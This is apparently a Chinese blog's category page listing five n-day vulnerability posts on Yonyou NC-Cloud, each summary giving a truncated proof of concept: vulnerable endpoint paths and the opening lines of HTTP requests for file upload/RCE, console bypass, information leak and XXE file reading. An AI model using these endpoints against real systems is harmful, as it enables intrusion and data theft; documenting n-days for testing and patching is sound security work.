为了能到远方,脚下的每一步都不|
收藏闪存小组博问

都吃泡芙

园龄:9个月粉丝:4关注:4

随笔分类 -  渗透测试 / nday / 用友

用友-NC-Cloud存在任意文件上传/RCE
摘要:漏洞复现: 首先上传jsp POC: POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l
74
0
0
用友-NC-Cloud存在控制台绕过漏洞
摘要:漏洞复现: POC: /uapws/index.jsp
27
0
0
用友-NC-Cloud存在接口信息泄露漏洞
摘要:漏洞复现: POC: /uapws/service
43
0
0
用友-NC-Cloud存在XXE漏洞
摘要:漏洞复现: POC: /uapws/service/nc.uap.oba.update.IUpdateService?wsdl
78
0
0
用友-NC-Cloud存在soapFormat-XXE 导致任意文件读取漏洞
摘要:漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
91
0
0
    //雪花飘落效果 //雪花飘落效果
    点击右上角即可分享
    微信分享提示
    深色
    回顶
    收起